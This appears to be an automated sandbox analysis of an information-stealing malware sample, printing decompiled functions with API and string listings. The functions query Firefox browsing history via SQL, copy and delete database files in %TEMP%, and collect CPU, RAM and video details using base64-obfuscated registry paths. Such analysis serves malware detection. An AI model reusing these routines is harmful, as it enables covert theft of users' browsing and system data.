SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412666
.tmp, xrefs: 0041259B
, xrefs: 00412730

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
API String ID: 2381671008-462058183
Opcode ID: 74af028e87f69800883d2846e1069ba7485055c1e626ef979e211516bbf6465a
Instruction ID: 96711d942fa6cd82f2097d7fbc3cef73731e9345f18fca2529b5113db019f3e4
Opcode Fuzzy Hash: 74af028e87f69800883d2846e1069ba7485055c1e626ef979e211516bbf6465a
Instruction Fuzzy Hash: 70810A71A00109AFDB00EB95DD82EDEBBB8EF48305F504536F414F72A1DB78AE568B58

Uniqueness

Uniqueness Score: -1.00%

Function 00415E3C, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00415E3C(intOrPtr* __eax, void* __ebx, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t38;
				signed int _t39;
				signed int _t92;
				void* _t93;
				void* _t94;
				intOrPtr _t113;
				void* _t117;
				intOrPtr _t120;
				intOrPtr _t121;

				_t118 = __esi;
				_t38 = __eax +  *__eax;
				 *_t38 =  *_t38 + _t38;
				_t39 = _t38 | 0x5500000a;
				_t120 = _t121;
				_t93 = 0xb;
				do {
					_push(0);
					_push(0);
					_t93 = _t93 - 1;
					_t124 = _t93;
				} while (_t93 != 0);
				_t92 = _t39;
				_push(_t120);
				_push(0x415fd0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121;
				GetSystemInfo( &_v40);
				E00403D88( &_v48,  *_t92);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E004069A8("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t92,  &_v60, _t117, __esi);
				E00403D88( &_v56, _v60);
				_push(_v56);
				E004069A8("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t92,  &_v68, _t117, __esi);
				E00403D88( &_v64, _v68);
				_pop(_t94);
				E004075C0(0x80000002, _t92, _t94, _v64);
				_push(_v52);
				_push(0x416070);
				E00403E78();
				E0040377C(_t92, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t92);
				E00403D88( &_v76, _v80);
				_push(_v76);
				E0040709C(_v40.dwNumberOfProcessors, _t92,  &_v84, __esi, _t124);
				_push(_v84);
				_push(0x416070);
				E00403E78();
				E0040377C(_t92, _v72);
				_push( *_t92);
				_push("GetRAM: ");
				E00415CA0( &_v88, _t92, _t118, _t124);
				_push(_v88);
				_push(0x4160a8);
				E00403850();
				_push( *_t92);
				_push("Video Info\r\n");
				E00415D60( &_v92, _t92, _t117, _t118);
				_push(_v92);
				E00403850();
				_t113 = 0x4160a8;
				 *[fs:eax] = _t113;
				_push(E00415FD7);
				E00403508( &_v92, 2);
				E00403BDC( &_v84);
				E004034E4( &_v80);
				E00403BF4( &_v76, 2);
				E004034E4( &_v68);
				E00403BDC( &_v64);
				E004034E4( &_v60);
				return E00403BF4( &_v56, 4);
			}

0x00415e3c
0x00415e3c
0x00415e3e
0x00415e40
0x00415e45
0x00415e47
0x00415e4c
0x00415e4c
0x00415e4e
0x00415e50
0x00415e50
0x00415e50
0x00415e54
0x00415e58
0x00415e59
0x00415e5e
0x00415e61
0x00415e68
0x00415e72
0x00415e77
0x00415e7a
0x00415e7f
0x00415e84
0x00415e8d
0x00415e98
0x00415ea0
0x00415ea9
0x00415eb4
0x00415ec1
0x00415ec2
0x00415ec7
0x00415eca
0x00415ed7
0x00415ee1
0x00415ef0
0x00415efb
0x00415f00
0x00415f09
0x00415f0e
0x00415f11
0x00415f1e
0x00415f28
0x00415f2d
0x00415f2f
0x00415f37
0x00415f3c
0x00415f3f
0x00415f4b
0x00415f50
0x00415f52
0x00415f5a
0x00415f5f
0x00415f6e
0x00415f75
0x00415f78
0x00415f7b
0x00415f88
0x00415f90
0x00415f98
0x00415fa5
0x00415fad
0x00415fb5
0x00415fbd
0x00415fcf

APIs

GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

GetRAM: , xrefs: 00415F2F
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 00415E88
CPU Model: , xrefs: 00415E7A
CPU Count: , xrefs: 00415EEB
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 00415EA4
Video Info, xrefs: 00415F52

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: e3329636347596496c804121c37975c5fee0a9f2c2cf4a950dd5601219652f8f
Instruction ID: 841de3dabe4d1ada80fc57b7235bfd5090272e00ed4efe0c369eb699e4c4d56e
Opcode Fuzzy Hash: e3329636347596496c804121c37975c5fee0a9f2c2cf4a950dd5601219652f8f
Instruction Fuzzy Hash: 3941E274A00108ABCB01EFD1D842FCDBBB9EF48305F51813BF504B7296D679EA468B59

Uniqueness

Uniqueness Score: -1.00%

Function 00415E44, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00415E44(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr* _t90;
				void* _t91;
				void* _t92;
				intOrPtr _t111;
				intOrPtr _t118;
				intOrPtr _t119;

				_t116 = __esi;
				_t115 = __edi;
				_t118 = _t119;
				_t91 = 0xb;
				do {
					_push(0);
					_push(0);
					_t91 = _t91 - 1;
					_t120 = _t91;
				} while (_t91 != 0);
				_t90 = __eax;
				_push(_t118);
				_push(0x415fd0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				GetSystemInfo( &_v40);
				E00403D88( &_v48,  *_t90);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E004069A8("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t90,  &_v60, __edi, __esi);
				E00403D88( &_v56, _v60);
				_push(_v56);
				E004069A8("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t90,  &_v68, __edi, __esi);
				E00403D88( &_v64, _v68);
				_pop(_t92);
				E004075C0(0x80000002, _t90, _t92, _v64);
				_push(_v52);
				_push(0x416070);
				E00403E78();
				E0040377C(_t90, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t90);
				E00403D88( &_v76, _v80);
				_push(_v76);
				E0040709C(_v40.dwNumberOfProcessors, _t90,  &_v84, _t116, _t120);
				_push(_v84);
				_push(0x416070);
				E00403E78();
				E0040377C(_t90, _v72);
				_push( *_t90);
				_push("GetRAM: ");
				E00415CA0( &_v88, _t90, _t116, _t120);
				_push(_v88);
				_push(0x4160a8);
				E00403850();
				_push( *_t90);
				_push("Video Info\r\n");
				E00415D60( &_v92, _t90, _t115, _t116);
				_push(_v92);
				E00403850();
				_t111 = 0x4160a8;
				 *[fs:eax] = _t111;
				_push(E00415FD7);
				E00403508( &_v92, 2);
				E00403BDC( &_v84);
				E004034E4( &_v80);
				E00403BF4( &_v76, 2);
				E004034E4( &_v68);
				E00403BDC( &_v64);
				E004034E4( &_v60);
				return E00403BF4( &_v56, 4);
			}

0x00415e44
0x00415e44
0x00415e45
0x00415e47
0x00415e4c
0x00415e4c
0x00415e4e
0x00415e50
0x00415e50
0x00415e50
0x00415e54
0x00415e58
0x00415e59
0x00415e5e
0x00415e61
0x00415e68
0x00415e72
0x00415e77
0x00415e7a
0x00415e7f
0x00415e84
0x00415e8d
0x00415e98
0x00415ea0
0x00415ea9
0x00415eb4
0x00415ec1
0x00415ec2
0x00415ec7
0x00415eca
0x00415ed7
0x00415ee1
0x00415ef0
0x00415efb
0x00415f00
0x00415f09
0x00415f0e
0x00415f11
0x00415f1e
0x00415f28
0x00415f2d
0x00415f2f
0x00415f37
0x00415f3c
0x00415f3f
0x00415f4b
0x00415f50
0x00415f52
0x00415f5a
0x00415f5f
0x00415f6e
0x00415f75
0x00415f78
0x00415f7b
0x00415f88
0x00415f90
0x00415f98
0x00415fa5
0x00415fad
0x00415fb5
0x00415fbd
0x00415fcf

APIs

GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

GetRAM: , xrefs: 00415F2F
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 00415E88
CPU Model: , xrefs: 00415E7A
CPU Count: , xrefs: 00415EEB
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 00415EA4
Video Info, xrefs: 00415F52

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: a611c49ac069c5e380e44cd9a16c7ef5b0defb37ecc81f47e8648592268aafc1
Instruction ID: 6ee615b5186dd69ea9a83c9e9698d3011ce36d6a126617133cf52e038528ef4b
Opcode Fuzzy Hash: a611c49ac069c5e380e44cd9a16c7ef5b0defb37ecc81f47e8648592268aafc1
Instruction Fuzzy Hash: 9941F174A00108ABCB01EFD1D842FCDBBB9AF48305F51413BF504B7296D678EA468B59

Uniqueness

Uniqueness Score: -1.00%

Function 00403368, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00403368(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x41c034 == 0) {
					if( *0x41b024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x41c208 == 0xd7b2 &&  *0x41c210 > 0) {
						 *0x41c220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E004033F0, 2,  &_v4, 0);
				}
			}

0x00403370
0x004033d0
0x004033e0
0x004033e0
0x004033e6
0x00403372
0x0040337b
0x0040338b
0x0040338b
0x004033a7
0x004033c8
0x004033c8

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A212,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436), ref: 004033BC
WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A212,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436), ref: 004033C2
MessageBoxA.USER32 ref: 004033E0

Strings

Runtime error at 00000000, xrefs: 0040339A, 004033D9
Error, xrefs: 004033D4

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D

Uniqueness

Uniqueness Score: -1.00%

Function 004112D0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234
fileCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E004112D0(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				WCHAR* _t83;
				intOrPtr* _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				intOrPtr* _t106;
				intOrPtr* _t134;
				intOrPtr* _t138;
				intOrPtr _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t146;
				intOrPtr* _t150;
				void* _t152;
				intOrPtr* _t157;
				intOrPtr* _t163;
				intOrPtr* _t169;
				void* _t171;
				intOrPtr* _t175;
				void* _t178;
				intOrPtr _t199;
				intOrPtr _t201;
				void* _t206;
				intOrPtr _t212;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t218;
				void* _t219;

				_t214 = __esi;
				_t177 = __ebx;
				_t216 = _t217;
				_t178 = 0xa;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t224 = _t178;
				} while (_t178 != 0);
				_push(_t178);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E00404150( &_v8);
				_push(_t216);
				_push(0x4115ab);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				E00403BDC( &_v28);
				_push(_t216);
				_push(0x411526);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				E0040709C(GetTickCount(), __ebx,  &_v52, __esi, _t224);
				_push(_v52);
				E00406FDC( &_v56, __ebx, __edi, __esi, _t224);
				_push(_v56);
				_push(L".tmp");
				E00403E78();
				E004078D8(_v8, _t177,  &_v40, _t224);
				E004062FC(L"%TEMP%",  &_v64, _t224);
				_push(_v64);
				_push(0x4115e4);
				_push(_v32);
				E00403E78();
				E004078D8(_v60, _t177,  &_v44, _t224);
				_t83 = E00403D98(_v44);
				CopyFileW(E00403D98(_v40), _t83, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404B58(_v68, _t177, _t178,  &_v36, _t214, _t224);
				E00403D88( &_v72, _v36);
				if(E0040776C(_v72, _t177, _t178) != 0) {
					_t98 =  *0x41b140; // 0x41ca20
					_t100 =  *((intOrPtr*)( *_t98))(E00403990(_v36),  &_v16);
					_t218 = _t217 + 8;
					__eflags = _t100;
					if(_t100 == 0) {
						_t134 =  *0x41b390; // 0x41c934
						_t138 =  *0x41b2d4; // 0x41ca28
						_t140 =  *((intOrPtr*)( *_t138))(_v16, E00403990( *_t134), 0xffffffff,  &_v20,  &_v24);
						_t219 = _t218 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b384; // 0x41ca2c
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								_t146 =  *0x41b414; // 0x41ca34
								_t150 =  *0x41b1dc; // 0x41ca30
								_t152 =  *((intOrPtr*)( *_t150))(_v20, 3,  *((intOrPtr*)( *_t146))(_v20, 3));
								_pop(_t206);
								E0040A610(_t152,  &_v48, _t206);
								E00403D88( &_v76, _v48);
								_t157 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v80,  *((intOrPtr*)( *_t157))(_v20, 0, 0x4115ec, _v76, _v28));
								_t163 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v84,  *((intOrPtr*)( *_t163))(_v20, 1, 0x4115ec, _v80));
								_t169 =  *0x41b1dc; // 0x41ca30
								_t171 =  *((intOrPtr*)( *_t169))(_v20, 2, 0x4115f8, _v84);
								_t219 = _t219 + 0x28;
								E00403CF4( &_v88, _t171);
								_push(_v88);
								_push(L"\r\n\r\n");
								E00403E78();
								_t175 =  *0x41b1cc; // 0x41b0b4
								 *_t175 =  *_t175 + 1;
								__eflags =  *_t175;
							}
						}
					}
					L9:
					_t102 =  *0x41b46c; // 0x41ca38
					 *((intOrPtr*)( *_t102))(_v20);
					_t106 =  *0x41b20c; // 0x41ca24
					 *((intOrPtr*)( *_t106))(_v16);
					_pop(_t199);
					 *[fs:eax] = _t199;
					E00403C18(_v12, _v28);
					DeleteFileW(E00403D98(_v44));
				} else {
					_pop(_t212);
					 *[fs:eax] = _t212;
				}
				_pop(_t201);
				 *[fs:eax] = _t201;
				_push(E004115B2);
				E00403BF4( &_v88, 5);
				E004034E4( &_v68);
				E00403BF4( &_v64, 4);
				E004034E4( &_v48);
				E00403BF4( &_v44, 2);
				E004034E4( &_v36);
				E00403BF4( &_v32, 2);
				return E00403BDC( &_v8);
			}

0x004112d0
0x004112d0
0x004112d1
0x004112d3
0x004112d8
0x004112d8
0x004112da
0x004112dc
0x004112dc
0x004112dc
0x004112df
0x004112e0
0x004112e1
0x004112e2
0x004112e3
0x004112e6
0x004112ec
0x004112f3
0x004112f4
0x004112f9
0x004112fc
0x00411302
0x00411309
0x0041130a
0x0041130f
0x00411312
0x0041131d
0x00411322
0x00411328
0x0041132d
0x00411330
0x0041133d
0x00411348
0x00411355
0x0041135a
0x0041135d
0x00411362
0x0041136d
0x00411378
0x00411382
0x00411391
0x0041139c
0x004113a7
0x004113b2
0x004113c1
0x004113dd
0x004113e4
0x004113e6
0x004113e9
0x004113eb
0x004113fb
0x0041140c
0x00411413
0x00411415
0x00411418
0x0041141a
0x004114e9
0x004114ed
0x004114f4
0x004114f7
0x004114fa
0x00000000
0x00000000
0x0041142b
0x0041143e
0x00411445
0x0041144d
0x0041144e
0x0041145c
0x0041146f
0x00411480
0x00411493
0x004114a4
0x004114b7
0x004114be
0x004114c0
0x004114c8
0x004114cd
0x004114d0
0x004114dd
0x004114e2
0x004114e7
0x004114e7
0x004114e7
0x004114e9
0x0041141a
0x00411500
0x00411504
0x0041150b
0x00411512
0x00411519
0x0041151e
0x00411521
0x00411536
0x00411544
0x004113c3
0x004113c5
0x004113c8
0x004113c8
0x0041154b
0x0041154e
0x00411551
0x0041155e
0x00411566
0x00411573
0x0041157b
0x00411588
0x00411590
0x0041159d
0x004115aa

APIs

GetTickCount.KERNEL32 ref: 00411315
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
DeleteFileW.KERNEL32(00000000), ref: 00411544

Strings

.tmp, xrefs: 00411330
, xrefs: 004114D0
%TEMP%, xrefs: 00411350

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp
API String ID: 2381671008-2792595090
Opcode ID: 999a6dcd94329e66fb0c1ca6b512f09a510efeadcb57a00f6471d8c614f23e15
Instruction ID: 2907a0a36d16f86ef06436b94052184e29eddf1806116983537aed2fe47c33e4
Opcode Fuzzy Hash: 999a6dcd94329e66fb0c1ca6b512f09a510efeadcb57a00f6471d8c614f23e15
Instruction Fuzzy Hash: 8C81F871A00109AFDB00EF95DC82EDEBBB9EF49305F508436F514F72A1DB38AA458B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEBC, Relevance: 9.2, APIs: 6, Instructions: 183
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040BEBC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr* _t61;
				CHAR* _t63;
				intOrPtr* _t64;
				intOrPtr* _t81;
				intOrPtr* _t92;
				_Unknown_base(*)()* _t95;
				intOrPtr* _t96;
				intOrPtr* _t100;
				intOrPtr* _t137;
				struct HINSTANCE__* _t138;
				signed int _t139;
				intOrPtr* _t145;
				intOrPtr* _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr* _t163;
				intOrPtr* _t166;
				void* _t168;
				void* _t169;
				signed int _t174;
				void* _t175;
				void* _t177;

				_v76 = 0;
				_v72 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				 *[fs:eax] = _t177 + 0xffffffb8;
				_t61 =  *0x41b40c; // 0x41c9f4
				_t63 = E00403990( *_t61);
				_t64 =  *0x41b460; // 0x41c9f0
				_t137 = GetProcAddress(LoadLibraryA(E00403990( *_t64)), _t63);
				_t145 =  *0x41b41c; // 0x41c9f8
				E00403D88( &_v72,  *_t145);
				 *_t137(E00403D98(_v72),  &_v52,  *[fs:eax], 0x40c0de, _t177, __edi, __esi, __ebx, _t175);
				_t147 =  *0x41b430; // 0x41c9fc
				E00403D88( &_v76,  *_t147);
				 *_t137(E00403D98(_v76),  &_v68);
				_t81 =  *0x41b3a8; // 0x41ca00
				_t138 = LoadLibraryA(E00403990( *_t81));
				if(_t138 != 0) {
					_t92 =  *0x41b370; // 0x41ca04
					_t95 = GetProcAddress(_t138, E00403990( *_t92));
					_t96 =  *0x41b1a8; // 0x41ca08
					_t166 = GetProcAddress(_t138, E00403990( *_t96));
					_t100 =  *0x41b360; // 0x41ca0c
					_v8 = GetProcAddress(_t138, E00403990( *_t100));
					_v12 = 0;
					_push( &_v16);
					_push(0);
					_push( &_v52);
					if( *_t95() == 0) {
						_push( &_v20);
						_push( &_v12);
						_push(0x200);
						_push(_v16);
						if( *_t166() == 0) {
							_t168 = _v12 - 1;
							if(_t168 >= 0) {
								_t169 = _t168 + 1;
								_t139 = 0;
								do {
									_t153 =  *0x40be90; // 0x40be94
									E00404810( &_v24, _t153);
									_push( &_v24);
									_push(0);
									_push(0);
									_push(0);
									_t174 = (_t139 << 3) - _t139;
									_push( *((intOrPtr*)(_v20 + 0x18 + _t174 * 8)));
									_push( *((intOrPtr*)(_v20 + 0x14 + _t174 * 8)));
									_push( &_v68);
									_push(_v16);
									if(_v8() == 0) {
										E0040370C( &_v28,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x14 + _t174 * 8)) + 0x10)));
										E0040370C( &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x18 + _t174 * 8)) + 0x10)));
										E0040370C( &_v36,  *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x1c)) + 0x10)));
										if(E00403790(_v28) != 0 && E00403790(_v36) != 0) {
											_t163 =  *0x41b1c0; // 0x41ca10
											E0040525C(0x40c100, _t139, _v28,  *_t163, _t169, _t174, 0x40c0f4, _v36, _v32);
										}
									}
									_t139 = _t139 + 1;
									_t169 = _t169 - 1;
								} while (_t169 != 0);
							}
						}
					}
				}
				_pop(_t149);
				 *[fs:eax] = _t149;
				_push(E0040C0E5);
				E00403BF4( &_v76, 2);
				E00403508( &_v36, 3);
				_t152 =  *0x40be90; // 0x40be94
				return E00404280( &_v24, 2, _t152);
			}

0x0040bec7
0x0040beca
0x0040becd
0x0040bed0
0x0040bed3
0x0040bed6
0x0040bed9
0x0040bee7
0x0040beea
0x0040bef1
0x0040bef7
0x0040bf0f
0x0040bf18
0x0040bf20
0x0040bf2e
0x0040bf37
0x0040bf3f
0x0040bf4d
0x0040bf4f
0x0040bf61
0x0040bf65
0x0040bf6b
0x0040bf79
0x0040bf80
0x0040bf93
0x0040bf95
0x0040bfa8
0x0040bfad
0x0040bfb3
0x0040bfb4
0x0040bfb9
0x0040bfbe
0x0040bfc7
0x0040bfcb
0x0040bfcc
0x0040bfd4
0x0040bfd9
0x0040bfe2
0x0040bfe5
0x0040bfeb
0x0040bfec
0x0040bfee
0x0040bff1
0x0040bff7
0x0040bfff
0x0040c000
0x0040c002
0x0040c004
0x0040c00b
0x0040c014
0x0040c01c
0x0040c020
0x0040c024
0x0040c02a
0x0040c039
0x0040c04b
0x0040c05c
0x0040c06b
0x0040c086
0x0040c096
0x0040c096
0x0040c06b
0x0040c09b
0x0040c09c
0x0040c09c
0x0040bfee
0x0040bfe5
0x0040bfd9
0x0040bfbe
0x0040c0a5
0x0040c0a8
0x0040c0ab
0x0040c0b8
0x0040c0c5
0x0040c0cd
0x0040c0dd

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040C0DE,?,00000000,?,00000000), ref: 0040BF04
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF0A
LoadLibraryA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040BF5C
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF79
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF8E
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BFA3

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 6cba6da2323dd7d907e0dc00df1589a9f8d861ecf83175a0ac18562ac8fc467f
Instruction ID: 0e090bdfc3d65a5bca4157f74653ebb500d09f599f80782c5ae309756f7fedfb
Opcode Fuzzy Hash: 6cba6da2323dd7d907e0dc00df1589a9f8d861ecf83175a0ac18562ac8fc467f
Instruction Fuzzy Hash: A661A9B5A00209DFDB00EFA5C881A9EB7BDFF49304B50457AE914F7391D638ED458BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401934, Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401934() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x41c5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401A0A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011CC();
					}
					 *0x41c5ac = 0;
					_t3 =  *0x41c60c; // 0x0
					LocalFree(_t3);
					 *0x41c60c = 0;
					_t19 =  *0x41c5d4; // 0x41c5d4
					while(_t19 != 0x41c5d4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401234(0x41c5d4);
					E00401234(0x41c5e4);
					E00401234(0x41c610);
					_t14 =  *0x41c5cc; // 0x0
					while(_t14 != 0) {
						 *0x41c5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x41c5cc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401a11);
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011D4();
					}
					_push(0x41c5b4);
					L004011DC();
					return 0;
				}
			}

0x00401935
0x0040193f
0x00401a13
0x00401945
0x00401947
0x00401948
0x0040194d
0x00401950
0x0040195a
0x0040195c
0x00401961
0x00401961
0x00401966
0x0040196d
0x00401973
0x0040197a
0x0040197f
0x00401999
0x0040198e
0x00401992
0x00401997
0x00401997
0x004019a6
0x004019b0
0x004019ba
0x004019bf
0x004019c6
0x004019ca
0x004019d1
0x004019d6
0x004019db
0x004019e1
0x004019e4
0x004019e7
0x004019f3
0x004019f5
0x004019fa
0x004019fa
0x004019ff
0x00401a04
0x00401a09
0x00401a09

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
